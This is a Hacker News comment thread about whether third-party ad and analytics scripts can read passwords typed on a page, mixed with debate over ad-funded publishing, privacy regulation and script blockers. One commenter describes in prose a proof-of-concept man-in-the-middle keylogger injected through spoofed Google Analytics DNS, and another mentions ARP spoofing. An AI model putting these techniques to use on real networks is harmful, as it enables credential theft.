Hacker News new | past | comments | ask | show | jobs | submit login
Can ads on a page read my password? (stackexchange.com)
327 points by linux2647 17 days ago | hide | past | web | favorite | 134 comments



I really wish awareness of this reached a wider audience, third party advertising is a terrible blight on the web that has been allowed to grow and fester - it supplies no value and compromises both browser security and our peace of mind - being bombarded by these things constantly is training most of us to ignore a lot more and focus on short focused bursts of information...

IMO (and this is really deep into opinion) this has slowly been contributing to the lack of attention spans and un-inquisitive response most people have when things on facebook just straight out tell lies. Web-advertising has such a feeble value for the cost it's exacting.


If ads were just images / text links I wouldnt ever bother using an adblocker. But because pop ups and insane amounts of JS abuse, auto playing videos and browser exploits I just cant stand ads. At least ads in magazines flow with the content.


If you go to the Chase login page, it loads js from demdex.net.

DemDex "captures behavioral data on behalf of Websites and advertisers and stores it in a 'behavioral data bank.'"

uMatrix blocks it for me, but this shit could harvest banking credentials??

https://imgur.com/a/oTm09k2


> this shit could harvest banking credentials??

It's not that it happens or could happen, the problem is that when credentials are leaked the user gets all the blame: "not our fault, you probably had a virus on your device", and most users will believe it.


We need a sort of GDPR law but not as... Broad or unclear as it is. The problem is big tech companies would never draft a bill that puts them in a bad spot. For the People has become For the Corporations and it really does suck.


GDPR is actually very narrow, specific and clear, as far as privacy laws go.

The only unclear thing is the distinction between processor, manager and collection of data. That's because it's narrow in scope.


Demdex is a DMP from Adobe that is used by companies to manage their first-party data so this particular example with Chase is very likely not an example of third-party ad serving abuse. Chase would have presumably put Adobe through a security review during an RFP process and would have no reason to harvest their own customers' login credentials. Their use case is probably something benign like wanting to segment customers for targeting based on their site usage patterns. Chase has different login pages but the one I'm looking at doesn't appear to have any third-party JS loading from advertisers.


> I really wish awareness of this reached a wider audience

1) it will not happen, not even Cambridge Analytica did and Facebook plans for more "privacy" took the media, Facebook did nothing or too little and now people think they are safer

2) People will not help making digital security and privacy any better, I can't explain why, but it must come from trully ethical developers

Privacy must be set by default. Ad tech co. have an conflict of interest in this privacy matter and can't lead the way. Developers from ad tech will always truly believe they are doing what's better for users but they just can't for many reasons.

Privacy by default is not a dream, it is not utopia, but it requires another business model. Ads will simple not allow privacy.

My opinion anyway


> 2) People will not help making digital security and privacy any better

The biggest majority of Web users do not even realize how this stuff works. I asked one no technical friend what he thought about Google business model, the answer surprised me: they positioned themselves as intermediary on the Web so that most traffic goes through them so that they could serve ads. That's probably not completely incorrect but what regular paps and moms don't know is that web site creators themselves agreed to this deal with the devil and their soul is now completely gone. When no-one, not even the most valuable or knowledgeable customers complain about the gazillions of tracking scripts on the page, there's no way this could get better. For regular people "Privacy" means a few setting that you could change on some conglomerate web site until they rebuild/reset the page so that you'll have to do this all over again.


>That's probably not completely incorrect

Far from it:

From https://revenuesandprofits.com/how-google-makes-money/ :

>68.3% of the total, from the advertising over the Google websites

>21.2% of the total, from advertising over the Google Network Member’ websites

I couldn't find a more up-to-date source, but judging from these numbers website creators are responsible for only around a fifth of google's revenue.


It does provide value though. As much as I hate it most people don't want to pay for shit. So here we are.


I strongly disagree. I used to work on a MUD, the monthly run costs for that MUD came to $60. The MUD was free for anyone to play on - it had a website and forums and a server application to connect to via telnet. The cost for this came out of the fact that someone, somewhere needed to keep some servers running, and we needed to keep DNS working, the name registered... all of these ended up requiring three dedicated boxes which we got at a long term discounted rate because we knew a guy in a server farm where we could park our boxes.

Once upon a time it was a similar question if you wanted to run a hobbyist website, you needed a dedicated box somewhere or maybe to fork out 15/mo for some space on a shared host.

Now-a-days that MUD could easily run on the smallest cloud instance you could find with one less server even for a total of 10/mo - if you want to run a blog and tell the world about your intense interest in widget manufacturing there are cheap ways to host it - if the content is standard enough you might even be able to cut down the price to 10-20/yr.

It used to be that if you were so passionate about a topic you thought there needed to be a website about it then... you'd start it and host it yourself, it'd be an incidental cost that you'd just eat - then the mentality shifted to the assumption that your hosting of this thing should be profitable to you - you should get paid for maintaining such a site!

That's the real problem, people expect other people to pay for shit that nobody would pay for - since no one steps up to the "so reasonable" 10/mo subscription then ads are injected to make up for the "loss". If your site isn't valuable enough to get subscribers that doesn't mean it shouldn't exist, it just means that you should put up a donation page and treat any money you get out as an unbelievably strong endorsement of your decision to fund the existence of your little corner of the internet.


The company I work for has operating costs of $25MM+, we're a news site and would love to not have ads, but that's where 99% of our revenue comes from.

We break stories on corruption, injustice, and all kinds of other content. I think that running ads allowing us to do that would constitute as a benefit.


Sure but what we need is you to be able to be competitive serving ads yourselves from your own domain. Ideally, showing the exact same ads to everyone, just like a newspaper should.

It's not a criticism of you if you can't do that. It's where we need to be. Nobody opted in for all this surveillance. And there does also seem to be a lot of fraud in online advertising. Get everyone's phones and home routers running something like pi-hole and the whole advertising lanscape would change for the better. Google would hate it, sure, but so what? You might find your ads are more valuable too because seeing an ad in a genuine news source as context has more influence on a potential purchaser than seeing the exact same ad on john-does-racist-blog. Even if they are the exact same 2 eyeballs seeing both copies of the same ad.

Ads, sure. We're all basically fine with ads per se. Just not the current advertising arrangements involving reaming us with surveillance and all the other nasties as well. Didn't agree to it, don't want it, will block it and will prosletyse ad blocking.


Every site owner is free to serve "virtual print ads" from their own domain out of the box and they will pass any ad-blocker there is. Ad-networks are free to provide server side SDKs to their customers.

It's high time to accept responsibility for content you're serving! (As it is, high profile sites often deny any liability for 99% of the traffic they are brokering. The ad-and-tracking inflation of recent years is just insane.)


> We're all basically fine with ads per se.

Speak for yourself. I'm pretty allergic to ads - stopped watching tv, reading newspapers etc. a decade ago. No way I accept ads on the web just because they are in more traditional formats.


You are fine with it by exercising your option to avoid them in the normal, rational and informed manner. Don't like watching tv ads, don't watch commerical tv. Done. Clear, obvious, simple, rational and all consent is informed.


Newspapers ads - on paper - are text and graphics. No video, no code, no tracking. I think people are happy with that.

But ads on webpages - they're resource sucking privacy invading unvetted proprietary software. If your business requires you run those then you're getting blocked on every device I come into contact with forever.


I don't agree that doing one right thing (reporting on corruption) somehow makes it okay to do a wrong thing (not taking responsibility for the trackers you're exposing your visitors to). The fact that it pays for 99% of your fixed costs just says you are unlikely to start taking that responsibility any time soon. EDIT: I did not actually check your site and cannot confirm you host malicious ads. I wanted to make the general point; not attacking your site or work in any way.


Running ads, or tracking and selling visitors political views while also showing ads? I pay for ars technica who promises to turn off tracking and ads if you pay to subscribe and I wish other companies would do the same


or they could turn off all tracking because they're not evil. Just a thought.

I promise to stop punching you in the face if you pay me is not something I think is all that great to be honest. And then I'd have to trust them. But yeah, Ars Technica is not what it used to be since being bought by Conde Nast, right?


The difference is that you don't have to go on Ars Technica. Whereas you rarely choose to be punched in the face.

If the entry to a club was "either be punched in the face, or pay", I bet the majority of patrons would simply pay or go elsewhere. But on the internet, 99% of people either get punched or refuse both options and enter anyway.


Punched in the face, later, at our option or through our incompetence and we kept that secret from you and never got informed consent.

The analogy breaks down.

You aren't given the option, you wrote the option that websites and their 3rd party providers have to punch you without your knowledge. Stop reading Ars. Does that help you now you wrote that option? Maybe it does.

Better is to exercise your option to disrupt evil with uMatrix, pi-hole etc. Prosletyse it. The less money there is in the evil, the less it happens. How we defeated popups, for example.


Hosting costs are a small part of operating costs, compared to paying a living wage for even a few writers.


The rundown on your costs assume that the site or service remains “unpopular” (as in not used by the majority of internet users). Costs scale pretty high if one finds themselves running a high-traffic site.


I am working under the (I think reasonable assumption) that if your thing actually manages to become popular then you can either share governance and costs with a committee of interested parties or actually justify a subscriber model - possibly semi-voluntary style like patreon.


Neither helps in the short-term (say in the case of getting popular from a viral post where not living up to the momentum can mean losing out on the users), and while shared governance can work in a case where all parties have the same goal and are deep-pocketed, it has many risks when it comes to creative control and the user privacy/monetization scale. (What if someone had privately offered one of the MUD staff $500,000 to collect 'anonymous' data from users?)


I couldn’t agree more! I have a website for my personal projects (that occasionally gets a lot of traffic if a project winds up on HN or something) - it costs me about $10/mo to host completely ad-free, and probably only because I haven’t shopped around in like 6 years.


It is even worse with video, at least there are still plenty of websites made for love.

How many people do videos for purposes other than monetization?

Years ago I am sure that some people just wanted to share stuff with the world and get some feedback from like minded individuals.


People don't want to pay because most of the shit out there is shit. It's all supported by sensational headlines, controversial stories, fluff, and lies. If it all disappeared, we'd be left with things that exist because people care about it, things that are cheap to run, and things that are actually valuable enough to pay for. Can't be worse than the situation we have now, and you cut out a huge swath of parasites in the process.


>most people don't want to pay for shit

I’ve paid for news before and they still bloat their pages with ads to track me. It’s not a matter of people not wanting to pay. Customers are willing to pay for X and Y if and when it nets them a positive gain in their experience with a product. The problem is more about how these corporations are constantly making our experiences worse while also still tracking our every click.


Yeah, I'd actually be happy to pay... and I do for LWN, for example.

The problem is that publishers apparently(!) cannot properly distinguish between ad-driven revenue streams and good/loyal-customer revenue streams. (I don't know why this is even an issue, but here we are.)

Do NOT serve ads to your loyal revenue stream. Even if you can't make ends meet, do NOT do it. That will piss them off to no end, and they're your most loyal readers; they'll leave and never come back.


I asked someone in ad tech why “pay to remove the ads” is unheard of.

Think about it from the advertisers’ perspective:

You have a user base with a bunch of people. The ones that paid you to remove ads are, at least on average, wealthier than those that don’t. They certainly have disposable income.

In other words, the people that paid for a subscription are exactly the fraction of the audience the advertiser is paying for access to!

Of course, this argument falls apart for per-user targeted ads when ad blockers are prevalent. However, it makes perfect sense for display ads that are targeted based on content, or audience demographics, such as traditional mass media: tv, radio and newspapers.

In fact, the logic seems to extend to any website that is trying to charge an above-bottom-feeder premium for ad real estate.


How can it be claimed ads supply no value when lots of readers on this site rant about paywalls? People clearly are getting some kind of value from "free" ad-supported media.

I used to be editor-in-chief of my college newspaper. Most of our print ad revenue didn't actually come from direct sales. It came from national agencies that gave us insertion orders. I don't think we could have had a print edition based on our in-house ad sales.

Now imagine this problem for all kinds of other niche websites that can't afford to have their own ad sales teams... Suddenly it becomes clear why outsourcing ads generates a lot of value for cheapskate media consumers and for cash-strapped media organizations.


Back before HTTPS was prevalent, as a proof of concept, I set up a DNS server to redirect Google Analytics domains to an MITM server that added a keylogger and added some HTTP headers to tell it to cache it as long as possible. The result was a keylogger that persisted on most sites (anything with GA), even after I connected to a non-compromised DNS server.

Fortunately this is no longer possible because of HTTPS, but I was able to convince some big sites to switch to HTTPS because of it.


That is pretty sinister actually. Totally something you could do anywhere people get 'free' wifi.

If you look at the second answer (https://security.stackexchange.com/a/214877/12942) it looks like the GA code Goodreads is using specifically will use http:// instead of https:// if the current page is http-only. So that this would still work. There isn't a good reason to get third-party resources via http if https is available, even on non-https pages.


It's not a good reason, but it does avoid scary mixed-content warnings. Your (insecure) connection might not be secure!


How did you get clients to use your DNS server? Was it on a network where you controlled the router, or did you set up a WiFi base station that folks blindly connected to in public, or some other way?


I'm pretty sure you could do it with just ARP spoofing/poisoning (https://en.wikipedia.org/wiki/ARP_spoofing). No need to control any other node on the network.


Yes, I did it on my own network at the router level as a proof-of-concept. I didn't actually use it on other people, but the idea is that a malicious public network operator could do so and effectively install keyloggers on dozens of people per day.


You can't browse the web securely if you're being served third party ads. I'm not sure why this is considered acceptable and why the onus is always on the user to find and report the "bad" ads that a site owner has no control over, but it's really stupid.

I spent years browsing the web before there were any advertisements at all. There is no need for this garbage despite how many Stanford grads tell you it's totally necessary.


> I'm not sure why this is considered acceptable

Because ads make money to all parties except the user.


Worse, "Google Backdoor" (a/k/a "Tag Manager") lets third parties inject Javascript into your web pages. You can't even put Google's stuff into an IFRAME to sandbox it.[1] The Evil Empire does not like to be contained.

[1] https://adsense.googleblog.com/2011/06/clarifying-our-ad-imp...


And now Google staring its move against ad blockers by first restricting them and then forbidding (they will deny). But it's for performance and speed because ad blockers are so bloated /s. And if course Google can't do evil because "Don't do evil" /s


That is the whole point of safe-frames, which are default in DFP.

>While SafeFrame shares information with ad content served to its API-enabled iframe, the publisher chooses what to share and can protect sensitive consumer information like personal email addresses, passwords, or even banking information.

Docs for DFP: https://support.google.com/admanager/answer/6023110?hl=en Spec: https://www.iab.com/guidelines/safeframe/


For people not in the adtech space: DFP is DoubleClick For Publishers, who initially served banner ads and were bought by Google in 2008. https://en.wikipedia.org/wiki/DoubleClick


Technical measures can not be required to cover security holes. The holes must be closed. Otherwise it falls on users to audit all sorts of stuff they dont understand - and by users you can include developers.


This is not really a security hole. It's the intended behavior. Web developers (should) know that they are exposing all user behavior to the third-party code they bring in. The solution is to "no do that", but developers tend to choose convenience over safety, as do their clients, as do their clients users.


Sounds like a great reason to block ads, if not all 3rd party scripts.



Even imagining a world in which all the major browser vendors had agreed to constrain browsers to a pure HTML+CSS+flash-like-extension-free web, someone would've eventually come out with a heavily funded 'next gen' browser with their flash/silverlight equivalent, and we'd either be in proprietary-land, or right back here with an open JS equivalent, post-backlash. Ship sailed and always would have.


And that's why we enlist regulators to protect the consumers. This isn't new, you're right.


What are you gonna regulate here, ban third party code? Good luck with that.


Why do you assume regulating = banning?


Well, what's the alternative then?


Elect sane and involved policy makers to keep a watch on the market. Impose regulations that make it harder to exploit the consumer, and hold those who break these policies accountable.

I suppose the whole ban vs regulate issue is a matter of granularity. Regulation does impose a set of banned practices, but it's not like you make it out to be, where all 3rd party code would have to be banned.

The main issue is that we need to agree on what we are actually capable and interested in protecting, in an insanely fast moving industry. This is why motivated and educated policy makers are crucial to the problem. There's still to this day no where near the level of discourse on this subject that's needed happening in places with power to make a difference. Just like in the early days of the gold rush, I'm sure you could find countless cases of criminal shovel sellers.

But given the current ecosystem, this doesn't surprise me sadly. We (in the US) are locking kids up without parents for crimes they didn't commit. I suppose abusive or illegal ads aren't my biggest concern.


I'm sorry, I meant to ask: What's the alternative to banning third party JS? What's the actual regulation that should be enforced here? Do we ban specific behaviors of programs for third parties, but allow them for first parties? Make businesses pay for all the auditing?

Let me just say: I don't know what harebrained regulation would come out of this, but I'm pretty sure I don't want it.

> Elect sane and involved policy makers to keep a watch on the market.

That's not a solution, that's a fantasy scenario.


I'd like to see restrictions to what terms of service can permit. For example, it's one thing for me to be giving the 1st party some legal rights to collect information about me, it's another thing to allow essentially untrusted 3rd parties to collect as well. Some limits must be in place.

If this means some services are no longer viable because they can't make ad revenue, then maybe that's a good thing. Nothing is free, and we still live in the Wild West with companies getting away with monetizing our information behind our backs to subsidize the service. It's one thing to "pay" me for the time I watched your ad, it's another thing to "pay" me for a profile of my activity on the site or sites, which has enough information, generally, to uniquely identify me, and contains demographic and personal information determined by black boxes.

My point here might simply be, if it's my information, I should be entitled to know how it's actually being used.

But the first action I'd hoped to see is to make devices like the Amazon echo, and google home illegal.

> Probably the clearest example of a place where there's a reasonable expectation of privacy is in the home. A person doesn't have to be a homeowner for the law to protect that expectation; tenants who rent their homes also have a protected right to privacy. Moreover, invasion of privacy doesn't just mean that someone physically enters a place where a person has a reasonable expectation of privacy. It can also happen if someone uses electronic equipment to monitor or record what someone is doing in the home. [1]

This also goes for guests of your home, so as far as I'm concerned, Amazon (or my friend, or both) are/is breaking the law whenever I enter a home with one of these things installed. The regulation should demand a Amazon (in this example) to explicitly state how they are protecting my rights given the presence of an active microphone in the home. As things stand they are clearly not respecting our privacy.

Even Apple, who makes a point about how "Hey Siri" works isn't completely off the hook. I'd be interested in talking about Japan-esque laws requiring a sound to be played when Siri is activated, much like how a shutter noise must be played when a photo is taken.

The point here is, it's MY LIFE, I should at least know what's being done with it.

1: https://injury.findlaw.com/torts-and-personal-injuries/what-...


> For example, it's one thing for me to be giving the 1st party some legal rights to collect information about me, it's another thing to allow essentially untrusted 3rd parties to collect as well. Some limits must be in place.

In other words, if I defer any part of my services to a third party, I cannot do it anymore. Goodbye payment processing, fraud detection, spam/DDOS protection... the list is endless. Advertising is the least concern here.

See, that's the difficulty with regulation, you need to be very careful what is and isn't included. You don't want to accidentally prohibit crucial services. You don't want to burden business with liabilities by being vague. You don't want to leave too many loopholes or else your regulation does nothing but cause administrative overhead.

If you have so much faith in politicians to do go good job here, by all means, go out and lobby for this kind of regulation. Let's just say I don't share your optimism.

> My point here might simply be, if it's my information, I should be entitled to know how it's actually being used.

If you don't like your information being used for pretty much any purpose, don't give it to me. I can't preconceive of all the possible ways I am going to handle your data. Maybe I want to switch web hosts, or maybe I want to back it up somewhere else. Maybe I'm an idiot and I'll store it on a database with no password, exposed to the internet.

> This also goes for guests of your home...

Not necessarily. Depending on where this takes place, I don't have to disclose that you're being video or voice monitored. Maybe you don't like it that way, but those are my rights trumping yours.

> I'd be interested in talking about Japan-esque laws requiring a sound to be played when Siri is activated, much like how a shutter noise must be played when a photo is taken.

This is a good example of a pointless law. Sure, the cameras make a "shutter sound" when taking a photo, but they don't make a sound when recording video. When Siri activates, it does make sound, but if you want to activate it by voice, clearly it needs to listen all the time for the keyword (or whatever sounds like the keyword). There's no way around that.

So, what are you going to do, require bright flashing lights on all cameras/microphones?


umatrix makes it easy to disable all JS or all 3rd party JS:

https://addons.mozilla.org/en-US/firefox/addon/umatrix/

You can combine it with custom CSS through stylus:

https://addons.mozilla.org/en-US/firefox/addon/styl-us/


Do this. Do pi-hole too. But we shouldn't have to. If enough of us do maybe they'll stop all this 3rd party crap.

It shouldn't be up to users to audit every damn 3rd party url to protect themselves. You went to a single url the publisher of which should be completely responsible both morally and legally for all content. The end.


> It shouldn't be up to users to audit every damn 3rd party url to protect themselves. You went to a single url the publisher of which should be completely responsible both morally and legally for all content. The end.

In other words, shut down all businesses that rely on third party advertisement. Got it.


Absolutely if they're too stupid to move away from a broken (hopefully soon to be) unprofitable advertising model.

You are aware the advertising industry was immense before the web existed and there was no such thing as a third party ad? Network television, cable, newspapers, magazines, billboards and so on. There is literally no reason for the internet not to be like that if we want it to be. Massively profitibable for ads. Less bulls&^t surveillance. None ideally. Yeah bad for google. I am entirely happy for google to go bankrupt if they can't make money without surveillance that should be illegal and is immoral and for which they do not have informed consent. If you work there and get fired, I'm only slightly more sorry about that than I am if phillip morris employees get fired as people stop smoking.

You 100% need surveillance in your business model and we shut that down, sure, go bankrupt. Good.


> You are aware the advertising industry was immense before the web existed and there was no such thing as a third party ad? Network television, cable, newspapers, magazines, billboards and so on.

Yes, this is called "the old media" and it is on the way out. Do you realize how hard it was to get advertisers on board with your publication in those days?

The whole point of profiling you as a user is to show you ads that make sense to show. There is nothing morally wrong with this. You want to use my service, I need you to tell me about yourself so that I can convince my advertisers that showing you an ad is worth something instead of nothing. You get an ad that is relevant to you, I get paid to run the service, and it all happens automatically.

If I instead had to pitch my service to advertisers to run first party ads, I would also have to convince them that my impression counts are accurate and that my target demographic is what I claim it is. How am I supposed to do that without an impartial third party? Am I supposed to survey my users, taking their precious time?

Of course this is all possible, but only for big companies. It's not CNN or Fox or even Google that is going to go bankrupt. They can adapt their model. For the upstarts, you'd be nipping them in the bud. The big guys will thank you for that.


Businesses used to rely on pop-up ads too, before browsers started to ban them.

If browsers ban JS in ads, HTML based ads will rise in value.


> If browsers ban JS in ads, HTML based ads will rise in value.

How are you going to detect what third-party JS is an ad? That's basically the job of an ad blocker. Do you expect Google to ship an ad blocker that blocks ads of its competitors? That'll be a great antitrust lawsuit.


Stupid question: why not make password-marked fields something that JS engines simply can't read from? I imagine it would stop you from client-side warnings of password insecurity, but is there a bigger problem?


> I imagine it would stop you from client-side warnings of password insecurity, but is there a bigger problem?

The bigger problem is that passwords aren't half the sensitive data on the web, they're just the example people are using because everybody knows they need to be protected.

If you protect the password from the script but it can still read your name and address, and your bank balance, and the private information you thought you were only sending to your spouse, have we actually solved the problem? No.


I imagine it would be pretty easy for the js to just remove the element from the DOM and replace it with a similarly styled input if all we are doing is stopping it reading the contents of the password input


It would kill any site with an AJAX-based login.

Twitter, AirBnb, Facebook, Google, Apple...


Yeah, posting a form to login in is the exception nowadays.


A good thing, imho.


I use JavaScript on some password fields for client-side password hashing (reasoning: https://security.stackexchange.com/a/201099/10863), but I agree that this might be a useful thing. I can think of a few ways this could work:

- Blacklist or whitelist access: <input type=password nojs> or <input type=password allowjs>

- Specifically set a method that is called upon form submission: <input type=password onsubmit=hashPassword> <script>function hashPassword(value){ ... }</script> The catch here is that the browser would have to error out on reassignment of the hashPassword global variable, since that is what malware would do. This sounds easy, but it might be quite a bit more complexity for the browser's JS engine, since it has to check every assignment in the global scope against a list of functions that are used for password fields.

- Only allow access from the code path starting with the form's onsubmit event, so <form onsubmit="return validate(this)">. The catch here is that most modern websites do $("#myform").onsubmit=function(){...} which any malware could do as well, so that would have to be disallowed. A lot of devs wouldn't be happy about that.

Though for backwards compatibility, the opt-in method would probably be the only candidate for actual implementation in the foreseeable future.


That's a tricky one, though - you're basically deciding for your users if their credentials will be at risk. As one of your users I'd rather make that call for myself...


You're always making that call, either client or server side.


They don't really have read from it, they may just use keydown event, for example.


Capital One's site (which includes a login form) calls out to DoubleClick, Facebook, New Relic, something terrifyingly vague called xg4ken.com, and about a dozen other third parties.

One targeted compromise of any of these scripts would be catastrophic.


>calls out to DoubleClick, Facebook, New Relic, something terrifyingly vague called xg4ken.com, and about a dozen other third parties

Now imagine how many npm dependencies the backend or frontend has. How much do you trust marwahaha, yyx990803, or sokra?


Script inclusion is worse because you can decide what you send depending on ip, enabling targeted attacks. With NPM you will have to upload the malware for all to see.


> xg4ken.com is a domain registered under Kenshoo inc.

Why did they register such a bizarre domain, that even calls out the exact owner? To avoid blocker-lists for all of 3 seconds? Why not a subdomain, or at least a domain that doesn't look like that?


Maybe they wanted their presentational site to run under a different domain than their ad/tracker distribution site so that engineers who unknowingly block their ads can still learn about their business.

And blocklist maintainers tend to immediately block root domains I guess. (At least I would if I saw an obscure subdomain from a party I want to block.)


i tried watching the recent US democratic party prez debates on cnn.com and found out that it connects to at least 26 external domains, one of which was called summerhamster.com

just checked again and seems to be the same.


For an example on how to do this with fewer compromises on security, check out Dropbox's homepage. They also call out to a dozen third parties, but the entry point for all the JS is a sandboxed <iframe>, mitigating the fall out if some of that JS becomes malicious.


A company with Dropbox level money should be able to write all of their front end code. It's disgusting that few top 500 companies do.


I don't think any of the third-party JS is for functionality. Many large companies call out to 3rd parties not because they don't want to write code, but because they're using marketing services so they can do things like re-target users for ad displays on other websites.

(also many top N companies do use 3rd party code, like React, but they usually re-host that themselves)


Dropbox doesn't appear to have the strongest developers on the client side, so perhaps that's true on the front end as well.

I still get messages along the lines of, "Your hard drive is full. Dropbox cannot synchronize until you free up some disk space," with 4 GB free, even though many users have complained loudly about that for years. The Dropbox client was also causing weird problems with dropdown menus in MS Office applications for a long time, which took forever to track down. That at least appears to have been fixed now, although I can't (or perhaps don't want to) imagine how it happened in the first place.

Dropbox does hard things, HN conventional wisdom notwithstanding, and they do them reasonably well. But they can be very slow to recognize when they're doing something wrong.


A founder of a “customer experience” service cold-messaged me once. I came in to see more about what they were doing, and they interviewed me a bit.

As far as I could gather they provided a script to their customers that added event listeners to everything on the DOM and sent it to their servers. As far as I can tell, they were going fast and loose. They weren’t interested in me, but I must say I wasn’t interested in them either.


I was already blocking ads via uBlock Origin, but now I may start blocking third-party scripts by default.


I switched into a block all scripts by default web stance a while back and am continuously amused by how operable different sites are, some degrading relatively gracefully, some just going white screen (usually SPA of some sort) other sites go totally wonky when they find themselves unable to rewrite the DOM and style rules to render the page as they want - sorta close to that old occurrence when CSS would fail to download and you'd have a giant <ul> block that was being restyled as a menu... but far more disappointing because there is really no reason to push styling into JS and so many out-of-the-box responsive style frameworks at this point.


I use uMatrix on Linux and am continuously surprised how many blog-like websites could be plain HTML/CSS, since they just have text and images, but don't show any content at all with Javascript disabled. More and more often I'll just go back where I came from and don't bother with these sites anymore.


For non-technical blogs it's unfortunate because the authors don't know any better. For technical blogs it's a feature that lets you know someone is not worth listening to.


And the SVG icons... lol. Devs can't be bothered to set a reasonable default size in the image itself, so you're greeted with a huuuge twitter icon accross the entire screen and the page is just 20000px of huge "social" icons with 500px of text somewhere there if you scroll carefully.

Almost nobody actually cares about graceful degradation these days.


> some just going white screen

I find this happens with a lot of news sites. It's hilarious that a website made primarily for displaying text is absolutely defeated by turning off javascript.


CNN text only: https://lite.cnn.io/en

NPR text only: https://text.npr.org

And although not news, Facebook has a secret no-Javascript version here: https://mbasic.facebook.com


The really fun ones are the ones that work better with the JS disabled.


Best yet for me was 'client-side pricing' - I increased basket 'weight', and the web app neglected to correspondingly increase the price.


A blogs website whose logo is a big M?


At least 1st party javascript usually fixes white screen, but sometimes blocking styles does. What I also found interesting is that disabling javascript with CSP can sometimes fix websites too that are hostile in their <noscript> tag and CSP prevented javascript doesn't run <noscript>.


A surprising number of sites use third party cached versions of scripts - and a number still also use static domains... for instance stackoverflow.com uses sstatic.net I assume because all the stack sites refer to the same pool of scripts... this actually used to be a best practice for performant webpages since many browsers would limit the number of parallel resource downloads on a per-domain basis, so yahoo.com could render quicker if it has img3-yahoo.com and img2-yahoo.com and js-yahoo.com - though subdomains may have sufficed for that at that point, I can't quite recall.


I have a keyboard shortcut for a "dangerous" mode that allows 3rd party images, 3rd party styles, but still only 1st party javascript. Works for stackoverflow.com, not that it doesn't show content without any of 3rd party stuff and any scripts. But I get what you are talking about, different, but still technically 1st party domains and separate CDN domains for some websites is the reason I have rules in my extension, it's like whitelisting adblocking.


A possible solution for this would be for the extension blocking third party scripts to have a list of domains that are known to be associated, like stackoverflow.com and sstatic.net, and then consider the latter to be first party for the former, pre-populated for all the major sites.


If the list is domain based then you run into a "Who is paying to maintain the list" problem, and if it's self-registered (i.e. stackoverflow tells you sstatic.net is legit) then who verifies it was actually stackoverflow that told you that - and if you manager to verify that it came from someone within the domain or the registered owner... then how can you verify that sstatic isn't a domain serving malicious scripts and the owner isn't selling out users to the site to make a quick extra buck from some third party ad provider - or that it isn't the former owner who is acting maliciously - or that it isn't the current owner who is trying to undo the former owner who acted maliciously.

I think you could quite sanely track a few sites, maybe the top 200 or 300... after that it'd get unwieldy.

And, for fun, on the other side I believe a few years ago google's in house public hosting of jQuery received a bad push and was serving a tainted package for a while... even the good actors can mess this up.

A peer vetting system might work well (like DNS) but it'd need a lot of careful thought.


Maintaining the list for the most popular sites is not a huge ordeal. You have a bug tracker where people can submit issues, when you get one you take a few minutes to check that the whois matches the main site and the page actually links the script in a way consistent with what we want to approve, and the opposite if you get a report of something having changed the other way. An individual could do it by spending a few hours a month.

For less popular sites, the user can add it manually, or the site operator notices their site is broken for increasingly many users and stops linking scripts from other domains.

> And, for fun, on the other side I believe a few years ago google's in house public hosting of jQuery received a bad push and was serving a tainted package for a while... even the good actors can mess this up.

That's an independent problem. You could have the same thing happen for actual first party scripts.

And in this context if they're really good actors then they fix it as soon as it's discovered, and if they're not then you take them off the approved list.


It can be done and can be pretty nice. I got to around 30 websites myself with just custom CSP policies for each and plenty of ideas what to do next. Like making CSP policies composable, so I can define a rule for say recaptcha and include it for websites that use it and things like that. Javascript walls (cloudflare, sucuri, etc.) is another problem, you wouldn't want to enable javascript just to pass them and you wouldn't want to pass them automatically as it would allow websites to enable javascript. They also may include recaptcha, etc. Still, nothing that can't be solved.


uMatrix is pretty effective. The web is noticeably less terrible with it, although you may have to re-enable scripts on some sites from time to time for them to work completely.


The constant necessity to re-enable turned me off from Matrix, and I'd guess many others. Perhaps the defaults should be much softer.


I would like to point out that, despite this arguably catastrophic situation, it's not much of an issue in practice.

Stealing credentials through third party code is a relatively expensive attack. It has to be engineered for a specific site and then it needs to pass the auditing of the vector (i.e. the ad network, or the developers).

Once the attacker has achieved that, what do they get? The credentials for most sites are worthless. Of course some users might use the same password on multiple sites, but they had it coming.

Those sites that do have valuable credentials also have heightened security measures. If your bank is serving you ads on the login screen, perhaps you should use another bank.


Running uBlock or similar is now a part of a basic web browsing hygiene.

There used to be starting projects which used cryptocurrency or some other token system to allow you to "load" your browser with credits, which then would get auto (or semi-auto) voluntarily distributed to the websites you read, which support this mechanism. But I think they haven't caught on. But essentially, I hope they come back.

In the mean time, I'm still waiting for a reasonable solution to block advertising and tracking scripts on the mobile - as e.g. I think no sane (and informed) person will use a closed source browser, e.g. Brave.


Assuming you are using Firefox on Android, you can use uBlock Origin or almost any other extension as you would on desktop.


uBO works on desktop Brave too (a lot of redundancy but it adds 1st party blocking features) and we will keep it working, whereas Google seems intent on breaking it with Manifest V3 extension API changes.


Brave is all open source. Why did you think otherwise?


I was trying to find its source once and I couldn't. Thanks!


Regarding the answer: >It's worse than that. Web performance tools and similar not only read your credentials but they read the credentials you type and then delete. Very nasty. You might be able to get away with not typing, always pasting your credentials. But the javascript has access to your DOM so it can just read every element. The only way to stop that is not to use credentials but to use oAuth and hand you life over to Google. What could go wrong.

What’s the technical explanation how OAuth is safe in this context? If the DOM is accessible wouldn’t other things be accessible?


The authentication happens on a different site (the Google login site) then, and you only get back a token. The worst the ad could do is steal your token then, which will only be valid for a little while.


OTOH if it’s so easy to steal it, they could just steal the next one, not needing any credentials at all. Or steal the refresh token?


How would an ad possibly steal the token then?

Rephrase: how would one make sure it’s protected.


If you make sure that login/registration pages have no ads, that's not enough to be secure.

One example: you've probably clicked the "login" (or register) link from a page that does have ads, and a malicious script could've hijacked that click and presented you with a perfect replica of a login (or register) page, and then captured your input. And I'm sure there are many other such tricks.


It occurred to me that I, and others, are trying to deal with advertising the wrong way. It's a waste of time to try to filter out ads per page. There needs to be a way to search pages without ads (without javascript ads anyway) and to show pages without links to pages with ads.


Sadly google/facebook/amazon only cares to increase speed and loading pages fast. many new standards are being developed for this. but not about user security as ads is their primary business.


Pick a random webpage with ads, right click, and "inspect element".

You will see the ad is rendered in a sandboxed iframe.

It's true that the ad-network can usually run in the context of the main page, but the ad itself cannot.

The ad network is typically fairly trusted - they are profitable businesses with a lot to lose to lawsuits if they store or leak your password.

It's the ad itself that you shouldn't trust - anyone with $1 can submit an ad. And that's why it's sandboxed.


We all know this is not generally true. Ad networks will even explicitly allow advertisers to inject their own unsandboxed js. And so will publishers. But hypothetically if this was true still doesn't make a difference, adtech is pretty negligent of security.


> a lot to lose to lawsuits if they store or leak your password.

